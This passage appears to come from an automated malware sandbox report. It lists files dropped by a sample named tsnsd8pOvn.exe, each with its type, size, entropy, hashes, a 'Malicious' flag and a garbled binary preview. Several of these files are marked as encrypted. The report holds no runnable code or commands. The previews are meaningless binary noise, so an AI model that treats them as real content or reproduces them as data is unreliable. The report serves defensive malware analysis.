                              Preview:regf....L:K..}..,....h.x.E.R0.n.{..x,%w.+Z....S.^f.i$.y...p%.....r......... .q+=^.5...tm...H.$...R.....:U.).2M"...|.!1..........J..v.w.q..r...P..f<5q..dt..8.+f..Wh..P....\..."..!.m..(.XN.LA.f....S:.\Pp...F.e+r.B..8..._~....y^"..[....;....!......e..:._r...l.....0.f...V.....J!....ov\T".f..Y.{....M:kUi...... .....7.M...<.T>.n..Y.H...7.i......a.C.F.1.~.-x.e.~.*..h...s....=jUr"<.RB..e...@....;W..?i06..G2nq..Z.....2...7...Ht.=..Rq3....4Oh.$:...x~D...Y.....Hi......<.2.>.Ks.^...o.f%..au.?...6rl{..M.).6g..1.. $lj.zk..N.$.u.......,.>..y.E..wTj...O.F\G/3Ja.B....P.~.RZ..vjR.-u9....W.v...-...w~.u.1..V..:..o....~...s....dq.&...........m.]...(y...|......Tx.....QZx.Kx....vP....H...j.).Q..f..L....hc.....#BCX.F..&.%..=......H..z....O.......&..c...`....om.2..U........CP.f5S..4..j.0..[..oX.M...)e.B.j......,..Jr...]....E...k....}.3...w&{v..L..].%p.. tkz....y,Ym_...._m..yx66v|+.?Fws.M..Y.}k..A.9...g.B.........-<(...$Z...Zqw..o._i.v.^..>}.*...Q...a..
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):131406
                              Entropy (8bit):7.998577504148688
                              Encrypted:true
                              SSDEEP:3072:PvmfBpJ+QZigOkSs6e7vB22XQXqGcDmH403woIJGtURsd:nCdZese2AXuyH3uGtU+d
                              MD5:4A711AEC6034EA40754B020EA7133B43
                              SHA1:BD47CF2EECA854E0EC3657D4FC17A1735506B8C1
                              SHA-256:AC6F3E950E6C62126BF81BC6529EBD72A3E70B8063A52F5C1C097AB0214A5A06
                              SHA-512:DABE04306D21BD89C76E1951D50DBEB80C3D90C645724B54C617E50F943D4F6CEDC3CCA91EFB19CC6F8F5845A2F562D8E8F5BAE7D2A9061AD00000AD1FB389A8
                              Malicious:true
                              Preview:regf..;.V...b..}..... |I..xZ.^..7..7U.T....#..."r..6*..(.O.....{.f...n]Y.W......kj.R@......dUQ-. ...44.!....E........S47M.....S4h..-.cq..H.=.)...*H....:.....x{...^CP....'.O........nBr..6'/.K.%Ft.-A .R.J......sQ5.j....x...b.6...y..'..Z+.)..I.H[...mYR...G..O.,..cW.]..(.....T....|...Z......qd!+X.&...1+......R..d.e..N..d...U}..R....:p..}.....h$9...^.1<.t.....&P...!.....F!..c.._...%).....<.=v....R..-.*X.9mB...../.R..Z'.n>1.=O...?.a../.........V.p......@....A..8....u^....n.e.0<"...y....d.../s.....ck._q.m.R.T...{W..g....v(.'o.w..k@..~U.=~.n...;BW.k.k..]...e.....*....K...Pr..P.M@g.w....p..YU..*.9.V....b./{.g...y.U..l...\1y.)/....(_..2T=.l......=......m.&...;..tY.V..g%...}.B.....CU..J..:...~..f...........c.3.="1Q6P...Q.7l.2&>...7.w2..A....2X..pJ.d.T.e.1..:....%.."W..j.XID...z.SN.W=..e....M8....0.....hh.......%p}..{p.S|..6.*.....p.m.G].b...G..0.....o#..'.....,.(..A..d...fwL.r}.~...y)._j-...:m.x...?.D>.T.^e..B....?....K........d{..|....`6..6O...g.
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):87374
                              Entropy (8bit):7.997808666430593
                              Encrypted:true
                              SSDEEP:1536:Y5l7yYaGaKtOzXkKa2bpHuBCFKpsfjupJBj0D+BBDRKyer/DDWXaxnAea4QU5:ewGaKb8bpOBPpsfYUDER5OGaJpd
                              MD5:5E65F8FC81F98AC39DC6751EB13B027F
                              SHA1:BE0900922E7294A140DC5A4D833B33A732866C6F
                              SHA-256:D48AA8E2264CF34AE21B2B63BC47A8D7112CE4B4436E22FF5696255614BAADAD
                              SHA-512:22F4773766E7F01737C87916E5B9C7AAE3CD42A2D85B9E26B9A8F6E09C74692B4B99E46FD491071ED359F24E034AA809A63C9DE457D22A799EF9F0AE8E7465A2
                              Malicious:true
                              Preview:regf...CT.`...)^8....!U...e...o;....E...day.....:...(.3....tO..l.[.....6..#. M..%..VU.'...k.w.2=....{.h.....EE.....9.. w3`o...S...G....giu.T..I....%.?...<..*^...FT..=|.....-.Xn.S-..,,....y....z.0...#._....K.OT.f.~..a...e.,@...E..i<?K...i....M2FM...rM.F.....+.(.I...f..D...?=..~..I?U.+.k%..&.1.k..../..B.\;...Md.xV.U}v......}..>...w~.J6...X..B.Z;..V....a.r..4c..U.1P].UL..?....'~_.....A.b.19.2....d4;K.T...$.....W .7...3.*...4s....Z.x.C :...w.rS..7a~'..........UD.)QJ...r...^.J.|4.^.....&.t.[hz"*J.C.E...e3~..Z....I[.5..XR^(...y....;....#~.|p(.!.{..%...2.4..z.`X...ND'/.5.9..a3.......w.j..Kx...'..T.... .......\r#p1...5...xx...}.(..[.....E..w..2.7.].u.....h|.....)..;.p.W@+<..._.!...L.7vky?........O.b+.....`$`.I.....F.=|.li%...T...).S..4X....R..hC..#.c.....H9=.V4e..[^........G..9.MQ@...L..!.*...H.....-8<.e......7e.mz....P."6Py.K..!.p.H.aI..c....J..g.L.4..\0.O7S...11.]C..v...[..@..a%...8u$...h}..6Z......Gw..#p.[..9.=e'4...7#.:....m....xnS...Z.
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):8526
                              Entropy (8bit):7.978166280287917
                              Encrypted:false
                              SSDEEP:192:RxrCvQfTSBWt5F3el3qYxlCJ8AE/15SpflwYLx2NHw6zLL9VRgIMf:RcvQfTS8W64CJ6/3SpSmOQ6K
                              MD5:D5C9487302F000FF82CCDF8959533AD2
                              SHA1:AB5FC90F25749DB81842505B5D9F3A2BD3092A07
                              SHA-256:C3056FB30F352976E6E9EFA4FAFB711508453B0619E90ED94799B34F1B0F0FB1
                              SHA-512:66D47CC470308FECCA71648104EEF88D4EC37132EB1DAEAAE6CE9E6F2F5A58996322488654FA9E4874F640FA0E6349766CA72D6D92FDF00A377CE430196ECEC4
                              Malicious:false
                              Preview:regf..K..0.I.[`>pqA...t....J......Z8.0.1...-/.}.c.QU./M..0....M.....x.U0..<.H.r.....V.IRFk..O..jO...%J...8.:...r....x..o.lk.J.... .7L.R.G....}E.i#...x..8.[I....k...<9.>.;U........suI.R.+iq....,.g....s....=M'?Oz.Y.Q^BO...t....v$.n07$....@[..`.e.LK..m..Pr.@....R..o.5a.....`op...1O..W.J.l[Ai.^.f".DsJ.F.@.@...0L......"!....Q.p.@.]h..Q:zl.........(H.P*)./Vr%[f..y.....B.,<qj2r...p5..Y..b..Z.....LV|.Wu....dY..qd...K";....B..H..E..#.oM.....s.j...w!..'.V..(.c....|..@aM+.."..{....Z.P.....rx..#.EV...p.Df...k..GSCYP....*.!...\..?&.H.N..Q...!....l.!...~.1..b*.<2.......N.\...L".6..<...e..).S.).E.9.......j&...d..@.6.FO.gc..r.._..`U....T.8W....Ts..{V..33...:....X.....k>.O...9Z>6..-N...4n8.........../...,I.db1.$.{ks.J...r.|..H.....Z..D'.......#sj.W...)..;.....'..2.&.dq.g......TL.. ..z. ...........[=.C...v.x..\...+=jm.....i..YJ..1..RK.,W/.}.[.(r......=...O=.%.....@... _.,hP..>L[..m4.p.~.$v...Okk}.e.m.g......Q7...f)q#.....eL.....M...K.v..MB......
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):8526
                              Entropy (8bit):7.979787608149259
                              Encrypted:false
                              SSDEEP:192:60Lb6Q45imU08tHvKRWISsemZy8ZeOLU5bv99S3243x6f:6qB45ijPpINDkOLUJ43+
                              MD5:475F5E715CB5E12DE1051EA21DB685FD
                              SHA1:37E637DB794DCEC827F13D1EB3B61F3A72EBC2FB
                              SHA-256:43B4A50AF6A6566658B08F40C438E1BC205A1B25B29EA00F980E14B08D5396C2
                              SHA-512:ABED65D7C0AD9374A0BBBFE039E4AC2301247A52F1C76100D6B8835C25558B789003A825FC4EC6845C1B59369FBF82199D3BA2C0E86B38E154BB8A1C7889047F
                              Malicious:false
                              Preview:regf.C....|.........T.Ko......=..S.xc.6}...Iy:...V$.Ca,.TJ.....t..|;.O..T. \..P....Hb.G........S..b.../+.|.znA.....{.a...qL..0OD.=..aJ...{.I..U`v....-..x`...Z..k.)..E.....M^.Y.xEv.n..*...K.J.OQlA.E.}.8.*y..].s.5q.......z!.&......e.i...Hq.T..QN.x'..........[].;N5r....3..$.JdO.|...g.]...[.n..}{L4...3./..;.Q}....8.-..W.H.).Z4U..Q....i."S.Q..b..o..N.3..,^f.q...zO...%.....9...".w..E...*....7...i.d.$.........I..j.1.&..N_..bo....~....`:\..<S}j.......]...........>un..nI,....:6.@.....n]....F^_..?.7x..U.M.~..>c...n)..e...*... ..l.no......ld..A.`..b.D...a!....,.Hp......F...w....8..B...!......Z.....U.....M.....1u...{.3..+:..(a..&..R....*.h%1.\.}^.K.....o6..$.....(...I.Bd..,....H..)..qX...9.O.R..|.e8...|.........;...;S.s.........`..H.74.........j@CO3..p..6p.....{.....'./.&.c.........*.C...I...R...._.......4.....#I.vf.B@.v... .f..W..)/...f..W....Z.6..X>.&K.U../..L/.H8."N..>%#..x..t0.s-...L^s................O0...pt.T..uf......g.[}..P...ki._..s...7
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):8526
                              Entropy (8bit):7.979233671635034
                              Encrypted:false
                              SSDEEP:192:myee9tU3gmqlXl2wCipszb+mxkmejEBoL60Vee7MIYILmyf:6e9thma12ipUbdQoBmfeBIYIas
                              MD5:7080C591FBEAAA0126959CD67F2DCD15
                              SHA1:AF3B53D65AF40ED2FB7807354B9A0A73F54EBE28
                              SHA-256:CACDB1053BDCF0093234625EE5441B508AB1BBE3B5F3537C0082DCB42F75659F
                              SHA-512:051F7ADC6C0884D2AFD734DEA5045113C9D199BB5169C4C2A18DF43561E72D41FBD050865E80F5AFD769C39A4459C2A320B9EFBA0B43211EFF94FEAC18A5D8D1
                              Malicious:false
                              Preview:regf.RU..Y34A.?8.......t..... ..[#..#..J...b..).d5!.{..+9...T....e........O.V.Sb%.1.I....6........a.D....0......n.%P..q&.|.#.q..?O..+m...]....:.e..........-V....%..p.A....6D...*.kq..d.<NF.ux[..iVu.z..w.t:..r~!..~..`.WF.._.$ZsFa.U..X_...b>7..c.x....n.4D...4...+"..>o=.....%.mJs.+.jq.L..(O~...O.......?..3<..@...6....ss...o.....>..1.$.3.r.....T..pF.e..............m\.)....A'<..c.5.....`.T.V~Q<..-L...[.......Dt.c.......e>...k.....`....m..Q.Z.f|.......;>!...)r2X?^/S..h=^.D...l.V..,b.B5.E|>.Pm..Y.....u.I.e.s..5.b....IL..o.<.6E...pdr....qc....zp...w.......t.V=.N.h........]..Ij.Py...U...n...;...L.4$5.x.Q..p....5.... ......;...Y.d4;.....q..`.g".1.I.)..x....K{.....l....T..|..$..g.V.......[A.rws..........R.^..........q..v#.4-.n.R.(.a..>....^.O......s....64$.5...O.&..5y|F...vg..NS]...s..^........1@y.."7......o.-...9..a..M...s..N!=7.r.5.w.1...3.q...^%p...:.V&......H...Y/,.*...!.2..[....'T..3..Ta...M.....7.$*J.l.$6.H^Z<..Y...0.s\...%r.y..E.#...Z[a.F.
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):8526
                              Entropy (8bit):7.979314259099839
                              Encrypted:false
                              SSDEEP:192:Qk2zt6dfB2bD8Y1TH3535gBpMIjMZI3uUKkdvDoz8St0Jp/Ff:40tcbIYt3VypMIjMZI3NPvJp9
                              MD5:D8CAACC1BCBE030BC6FE7AE2905E9149
                              SHA1:1FDD1092D047CD4E017761E5669CB51F41EB1438
                              SHA-256:F5CB6C09A78C4A86B39301B7AAA4B59EDD0596485A80A3A7A972509989285EB7
                              SHA-512:15F711F05E5A954C02D187AF7C5135A6D1E8F5E039CB2583B27209F09DB2F17F97CBAC2A2CABC68A10570ABCCF9EBBAF11B918F0784162D68241A2F767241B6D
                              Malicious:false
                              Preview:regf...1.8..n-w;e...L{.s'.?..#........F...{z....|.}...4.......aPE.,..2.v..'.(..P..zI...e..Wf..../Y..........Y^.@.i.tV....F.....N..5H.`... .J....ax.J...z.....#.Rd.t.o...a.".M.(..W.'.6.....3W"r.fX..........d~bX...n.....8Y.....A.~.R:<t.U...m.^...R;5T^.<.qU<]4..O..KL..RZy.{m.t...D..~V>.f.?..}.....?G....U..".8..K.v.._SD....jB.....K....=......Mp.rtfG.GB.%.......}..T.:..2b)%...S,...7@..!.cs...U....bs..../..../.......V0..c"..3a.On.....kZ.)].3.t.v.}...XS...S....x..{..M.t...:....2j..q..=.....O.w..pOg.yJ_.O!......l.'..8..Z.E.j4.P....g..2[d.,".2o.wZ.4S.kR.=..P=..`)p..VI...%....]...V.....1..+..@].x...B.....>KT|.f..oFm...IH'...)]n.............].....3....6...Let6.T..G..y.%......5E.......<\....7...{.n.Kl.&...[U..@..3......e.....g...~'...ro.*.[.........".o6...Z.J.{E~^9".......s..}Rn..q.wA.....?..5@.<....o...............l....._y.......i.fRJ.+:....(.....{....ii....mE.Y.{fc..q...|..Svlo..t..Q@...4.3#.+.HZ..y...mq.4.:..d..Q...............A.~..V*
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):8526
                              Entropy (8bit):7.978073102102906
                              Encrypted:false
                              SSDEEP:192:pQAos9c+9HdqtNmtW9ra1MwMBSKxYPleYM5VN7xqDCgwHSRmUf:es9c+998kgra1MwiSKaPkPxkeglh
                              MD5:52C98470EA13E7174B3FDC351B3CF5DA
                              SHA1:5289CF75A2F98A15FF432142D549E7D366CE78AC
                              SHA-256:AC09B2BC3ED015B43ECE6426B905C10A62421E5F39A0028DC918DA2D2B3444CB
                              SHA-512:FFDF9FA1F5767F0EEF9D7340CF9BB4250DDB44E9AFBF9E542E7C6CA31E957F318FE5BE5F36DD2111BC9F5392C15E9725AA77BD3F8048CC4A80B789BF740ADB35
                              Malicious:false
                              Preview:regf..7.{...@.&..c...iPR....F.(8.m..Q.....ym<.0z/i.P.%&C.9.c.T....+....t....(.......!.....:.1I..>kM..U..QJl...K.Y.^.YY~....mN.Q..a.G...x.DB.....|}.1.'..i..\.u..../6...b..i"....Z..%...(.2...."..It...k.......k.9.>............7c...f...y.....V_y.7.$....eEZ..........Ii.Z..7...x\L......z.c=a.U._.{.....9....c0...6....{..\"D.D.i.X..H.L...i9..%.-..Z"&.}..Yl.*...o.#A.......).$....`uT.....C.z=.0._-....*.tU..:s..*.._..r`.o:.,a1*.$......@..[. ..Wl....p.4.]:.~p..8.2k.s.1,.{k.k;...>.`.$A...TljM".y.....v..?.R9..xN..|.jZ[;......*.Re..$..1.v\7.nP............OI..%@.!.._..6|.m...h....B...-7..M.4...@iw...p..|`_...Q.FtU...LH....<Z!S..X}(F=!....`..r.Z+........#B....;..6...w... ......r..A.St6I.FaE.H.Z...Z.45L..6.....b@.a...a%.OB...>..0]8f .%..>.2.I.......im.]6.Re..<....d...i.p3M...2..fV.Vn.SV....Zx...,....s(.oJ.........[b........?..3.......Io.TX~.l/O...'A[..hkO.....B..A.^.6.`......zkL..b1cV9.u|.....%U..j....8...a1.....K...$;.HV.gN.....m...h......~...X..9......9
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):4430
                              Entropy (8bit):7.951840192208709
                              Encrypted:false
                              SSDEEP:96:f8lhxDxQBzrGlR/GvHiZ2ozrNQH7YiP9EGyHPTXSJ0YaVtq334UGLZJ:f8vrGe/GvCZ2o3Ns7YiP9EzPTiJ3aVtl
                              MD5:5750DAA2F63CF02999FCD61146C802CF
                              SHA1:8A97095959CDEED313B2456A79FAB9517628F743
                              SHA-256:73A06D0C892C9EECE4EB78D17CEBD19C90F1F53202F91E357ABCC2BF21D5FA29
                              SHA-512:CBE70EFCCB291496E39C0EC6ACABD81597EDA87329887D443133A25A010F59A58CCF1ED2F280EA9A1D38916EE07CDBF3860CDCD3EF1FAB4641539E2720DD6359
                              Malicious:true
                              Preview:SQLit7...|QP....H@...)..N(.N6.N.hoK-.....P.........K...l...?;m%P.....c.o..Y.....Zh....:f..6.x.4.p...#..3..?.:W.C~..w.x...r.'.......1......s.Q..."...O.r.Bgw..8..z.e.~...A....|r. c *T.'%..j%D.......9.R5....@.v...p. j..-'6.\B....1.T....`.|.#...h.zN.1e......$+.(..e.P..p...Vx}...<.I<..O.l.3^_.4#xcw....4..:.-..W...g....G...8......`e.2n...m.L".c.,:p.........z.....'.M..).,]s].....\./......}.RR>. .W.{.k4)...-..x..".H..-=X?....W..G.|.s.O.1F.P0.......G.ADB!q.9..F7S.M1U6+F.H....T......#.f6%5...........VI...........3THN.....@.U.c...@.@F.U.f...~.._.u{....[`...c..o.i..2T...1@i.Z.....C.H.Cz.%8.}.c...J......X..M.B~.hiM..XbP.I...Z.Er...9~.}[.r...A..4...].HS......5K{..4k../a.6..qb...w.............d....3Z...z.Bv.I..A~\.2...A^.D.e.%..2...,y.kp.......nE..D-aZ.TW.!.u.N....k..s....X|@...t.#..~..x.^..{,o......F+..n9_.......t.PuW..]j...].+X......A.....z.. Ud....>.]{%.a.._.]....B?;.|1.-M.\.M...[....&......;m,.X..g..C...6....d8.~}.....j4.L".G....5...'^l.?>....>..
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):33102
                              Entropy (8bit):7.993888684469368
                              Encrypted:true
                              SSDEEP:768:MCkMwlNXjVoKGYjSkjlfs+/iopuu0JbUMMQabd/d95EpU3JB:MEwLtGeBjlfs+utUMCJ/rcI
                              MD5:B06A2008BF18DFC865D43799675FD49B
                              SHA1:953D35B74547C3084F9386986330C0DC78213995
                              SHA-256:B782F61DBC08F807DFFEAA417F1B6DBD5889B054A1DB89F41CD7E086C88BC053
                              SHA-512:7B0DB79FDDE38DAAE42D53245C84EB0D96DA17EC12C507C8FC9797EF51600086B4ADB4C32F78E1794078A4E6A27DE10493D61400BEC4A9C9B21F4B883A91FC9E
                              Malicious:true
                              Preview:..-..\lI.......>.?.A.....Z..7O.U.........J....k..C.T..M...k.\..F....q^.){...o-&.........}.=.a...m.+......\......+.K..i...OQ....i.$....<.,/.u.....`dr.>v%.....p.w.}...-J...G.!..W....E...i..m}.4[4.>N..RGFj..[R.##._.@.a.1.(+.0....:t.D.k}DzK..T<..s.{(F.j....,o..d0Y*.....PH..D.{..g.$..9=T....)..a-!...._...%+..&1.N.{R~.%....M.....2.[j..C.%S.......H.=54......-.X....s. ..r.p...;...&.JK..M0}..9.W.k..3.#-UA\}...l...... .......S...{........>...'.:..Z...7..bJ.u..3L.$..?..._.rJ...;.x..5..*.t"..T-.v..j..O...Z7`X..X..x=.l..a.......!.'*i$..Z.2Hl.....bP...7...ob.@g|............/...Zw.$.0.........v-..$. .1...%.8.....R.yJ..M....U.f.$..85...UTa].p....q.6.......a.......V..~C.l...z..#.y|?.ZIP..+.,..[ZG_R.,p.V..}X.q..NK .XR.{.$...1..O^.m....K9.......f; '.j8...EQ.n=.~.|2.8`...oQ,....E=jP....5$o..O.........V.......bC..[k5.....o..@.lEc.........9..X%.a.f.2.....2...=..$..P.3.F.a.{.7.0..R.U=e...D.eW.~...Rq.t...L..(!...a....H........JE....D...>|....z..E.4.O7.3.^1'H.Q.).e.u.8.]...}v...
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:SQLite Write-Ahead Log, version 1820956
                              Category:dropped
                              Size (bytes):1351726
                              Entropy (8bit):1.9810717462603633
                              Encrypted:false
                              SSDEEP:3072:7/KDMSNzKVCtFLpWnwDnXZT/lm2KGbxgeyDfiYfXwOuCA7JolR9FEeI0mGWPMfaD:7/aMSNGGLpWiJTNmqyRDaYFyh
                              MD5:1E13FE0D1EA6065C1C1551238E91E599
                              SHA1:21B92126C2FD1E390031BD1771CAF6D86B7767C2
                              SHA-256:1D00DE8687A110C307FFE715C273B242857B017E0A50067A87D624CF6A099981
                              SHA-512:69765FF9E245AC928F5A740CFBA8A6B14628C054D4F3A75008001EF24B7A135950FD1C556E0211AC81B0091BFC3505FE8231E5095BCF8EEA6FFC347A445781D0
                              Malicious:false
                              Preview:7..........>F.x.&...I;.r..V.fW..c.)u..FX..W.!...MN.x..B.Q..>...ft.V..~.C...w............-X..G....X..b.....+.=]b...sD....QV...9O.Q.d......|....W'.u.F..+...c.. ._..!.F......4@?.......[..........:U..mB.lf..S.$..pw?4^..4m@.JK....n.U.>.N.#..s.j.ay'R.....Q3...n.Y`...d....sb)}q.A..I.h....Y-T(*.[....+.l..F.d.....c{nH".WO..6.#Q....;n..;....L.R.._..1.....2.....4...(...N@...VJ...u.;*.u.@.....;....$}..i.....)A....8.9......6N.{.... .*.T_Z@..N'.b.E.......1;..=...b.i$.&.....4.... .fB....a.....8jJ[.h[.h4W..+.//..FH.$..[.Y..k....;gs..U.D.......1O.o...K./.71mU...jXn..+.u...._.V.i.V..Q7.g]...bj!..3....^<Y...Nz....a........B......4p&..g...*..M...S@.\m...O._...>.N.A..w....8gc..e*u...s...T).`.l.-C.[-W..]..G......V.*......X2...;....5...?.-,Y@kWjI9..OY....u....o.hP..........+..F+..Ez.@...1.}+.&..~..l.?...^d.b...>.Z...?..tX_.r.2W:.q..S....uD.w..=-.........`.........1#...+.!...R..M..G...t...4.jZ......:<.B...p.<HC.!.>..n....v..........q..Ca.Jo.0O..q..9..!F.
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):65870
                              Entropy (8bit):7.9970697789164
                              Encrypted:true
                              SSDEEP:1536:li1XjEP24M2/L754YqcCBN0CX715WXvMDuaJ/Wg8USkOSk:8XCJf5qcCBN0071s0DuMv8XkTk
                              MD5:D64E576960B4B84F0CB253882C779CAF
                              SHA1:440D74135192E571CA4C0E62A07DDE8B2FC738A2
                              SHA-256:D09574B38BA7EF1FD76E774DF951C30C7886FDE5AB7299A08EFD11EA54E98F6A
                              SHA-512:B6A7D57F834B419CE972345FCAAB2C6F6197BF0D52D626B601F12D81310E69357E71130004AD67BDA1261D5E2E54913B4B3BDF9D6A6680B03FF66ED1C69E7DDC
                              Malicious:true
                              Preview:.....A...b7..B...8c...........3..!...Q.1.3i..3...:f......2..$.<...K.~..v.q..+....4j...Wd..@..q..`A.....4.(..=../....c@.=f......N.!...I..S...(2....f.."M...3_.W.")W.n.~........z.{....A.=,H.-..W..A#...k..y.A.C.tA7.JW........6...h..%.L.p.;..{U.%.'.)?...e..%..Q=\;.....N..,...1j..6..8.9Ev...t.)o6..j..m.....PE.m...@m.wm}...9......D/.dd.k..f..sQ.rIs..X.5..Y.x.Z./....n.a....*v...d...9.....q1..*..T..W.u.*....J........F.J............#....._XYh.>.R.I...8."..e=.qc......Y..[.E.Nf)......Qo. .;....J...f.2$..W.jJ.4.~}H..p.P0O..!../..)7.@.^..JoO......3........[q.*....XW....,.z....zr./...M.A`....h.n...D.V.G.........NZv...^..}...W.%..)\f.lb!j....W..C0#:mM..x.i......H.....,...je^.M@./...1.0'....d..c:S`..Z......$?..J....\....0......h.1..A6...9.Pi..,N..3)0#... ..{..=..C..........EIp7..[.......'...N}#.2).M.......u,[3.V..|i...7... .vS5.QZ\.... u.>.X..[...8y.x..O..p...A..Y.....>|...b...x..i.....'..5.. ......q....|...~.."I(..(....lSO."....8..u..8v...F..b
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):8526
                              Entropy (8bit):7.977110710037125
                              Encrypted:false
                              SSDEEP:192:FSRIsFGasNAEyNvMhjYxY6hGLsncfIZuJ+i46d6CNVy54BetnXfj+9f:+IsozNtJhjkhGLsEJ+i4mBc6
                              MD5:1036546FD9C16ED0F73895B6817F9576
                              SHA1:C90A847686F0FAFAA09D0DB566CC8938F7937328
                              SHA-256:FBB9699007869930C5E102E65F02E9E66CEEE8EB821F2570B6596B4C0C0284F6
                              SHA-512:2DDC9D7FFA605243ABFDFA132BB335D95D40A096C13A937D4CA5F0B1C2CE75559D8A6325F5A1450AA377643EB028FCF141509C751885294E19B366121D9CFE5B
                              Malicious:false
                              Preview:regf.*.Of.cE'.L.....J.)...$#.~..F....+6....<..}9....9...~4...L....i.. j.Y.M.......9+.M.Z.....Wc.....Z...].......b..G..K.....Ly...t...0......::..1J.,7JJ...m...w......U.Bi]...\...I.._._....O.....4..v....'W..x..6.V../'.q\.kb..W.F.Y..C..p....X,.a......W1.O.........g..s.k6&..o_......C...QH..,<...N.d<HW<...k..~g.9C.......~.E8m.U..V.O.*....8.7...Fp<......_......G...^dGx..X.RZ..."K..L.u8^..7.w%V.8...j..:/...O..."J...2.b.o......I..TIb.k...vJ..........2O...k...6.F$O.......@c{.fU...r....O.!Db.}V..A..s -......=.........-FcdZ..Y.{TY...".C........|.f......)u.L.X..v....hi.'L..'.E. Ur...#....>..^3(........=.<.Y..`#....S...z.....4P.q...0..&.r...7@f|~....!8..#_.n.....M.. ....v..z....g.t.....J:Qt.F......Ph..a.....L.....XK.G.9.)..HS..I.L.nQ.rQy+...]....^....Q..zr",~.......F._EhW....G......>]BO{..Jz'...K.-.1....r.j..tb....y....q+.1%<.Nv....%.H..J.r. OF...~p.@chP'i0..{..j..z.Md..6..... 0.Y.....v..L......+.-..hB.E.|.....-.)...@.'....97..|.yN#A...G.3..'W..:Ed..
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):8526
                              Entropy (8bit):7.976607603429736
                              Encrypted:false
                              SSDEEP:192:2SjbpZvcWadBI4NNzowLyFvqosgP7DjbDywnlLGAfCxob+O3of:24tZ5qIizLyFdsgPDfyelLTfkoi46
                              MD5:704AE8D2FB581FCE0D331A584C35BEFB
                              SHA1:C46319F03DA9222D6A06EC5E8D4B5010F26D6041
                              SHA-256:C39B131C684847F02EC14EBB617B6D058293412259FA2EADE5853B2B96206C33
                              SHA-512:89BC232B55BF9CE0D6A544D45C27C80BC91B4F36356EF66139A3A2A148211DEBA570D32F3C4B0D165422A7BF588354BAEFB8BC1FE51EF2C463F05DE771A8935D
                              Malicious:false
                              Preview:regf...'...!'7,......).../..~3..z....`...2{.U(....^....!..C.}....[.{H.X.....G..+..X.B.U..0.bqw.~|...2.iT...J.6.F....j.tS4...yju..4f....~K...]j...fg..0.[...0.....|.r..L..x.@.\..."V.).'.e..Y4Hj...:....B.#n......}.w...Z.){...N..o..U.g.w6..,..xy/.NX.....@...r...|k.Y@..#.'....Dx...u.[..@.'.d6!...Y....pR...>.B$(.(.v...{.d.....<k...%K....H..9....$.(|.?....$......o.9.e...F.6..l...?...WG......DC].8Q>.*P.C....QS..k..).+9zz...-.H._..:^...$...A..&...........:/.{.URa..!...Yp..j/..*}.I.P.5...+0...,.;.f....v69...X~.-..Z......5$...UI...Sl..\I...b..`....iQ..i.Fxl.I....t..4...'f.r....]....f....-...D"Z..i.:...Z.bd..Z.A.......,.}.{e.~.D.....$....eH..\.+ .V&....B..y..-=a...F......].i.%.I.}q...\..{7....n..J. ....r:_9.H.S.<qD-.iD...v..O. vi....k....Ex...sT......_rf1~|.0..w..2!..O..ylY.Wce....."+s4..(...:.....B...MW.....<.O.&...@..'..".T.b.A..<.l..G7B.G.<.AV".v.v.B9`#7.N2...g.05..t...9..;..gR..SV..H....D...t...[...b(h".r...|..7..$..E..]........Q.p..6..
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):8526
                              Entropy (8bit):7.978721926619543
                              Encrypted:false
                              SSDEEP:192:+f6qIi5Ga6C/LgYEAyefWrW05AOs81OkEjkopRXiI5KtsIf:W6CGaFgHdjF5Atjhp8dtsa
                              MD5:6E61A685EB8B6C6F783DFE26DC0A5519
                              SHA1:1433079989A52B902C4FC851E7FBEDEB73434200
                              SHA-256:2D8EB804BD2F80AEE6F02EC0A93D824B05C1D16E60373F412A2F079FF8614AA0
                              SHA-512:476CE2C7FAC3468F4AB679D8F41F097B380F08269DD044AB60F80649D4533AC43BE61687EB2C63FF533A719E70EC76B38F243A43A6F70EC8C38EC44ACF314B8C
                              Malicious:false
